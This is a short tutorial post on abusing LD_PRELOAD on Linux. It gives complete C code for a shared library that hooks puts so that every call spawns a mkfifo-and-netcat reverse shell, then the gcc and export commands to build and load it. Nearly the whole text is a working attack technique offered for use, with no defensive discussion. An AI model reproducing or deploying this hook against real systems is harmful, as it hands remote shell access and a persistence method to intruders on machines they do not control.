Abusing LD_PRELOAD for Reverse Shell via Hooking Functions

17 Jun 2025

The puts function is modified to perform lateral movement and compiled as a shared library (.so). When the library path is provided to the LD_PRELOAD environment variable, the malicious code will be executed every time the puts function is called.

Here is the C code:

#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>

int puts(const char *message) {
    int (*new_puts)(const char *message);
    new_puts = dlsym(RTLD_NEXT, "puts");

    execl("/bin/sh", "sh", "-c", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 666 >/tmp/f", (char *) NULL);

    return new_puts("DEPLOYING...SHELL");
}

To compile the shared object:

malefic@xccvltvm:~$ gcc hook.c -o hook.so -fPIC -shared -ldl -D_GNU_SOURCE

Then, set the LD_PRELOAD environment variable:

malefic@xccvltvm:~$  export LD_PRELOAD="/home/malefic/hook.so"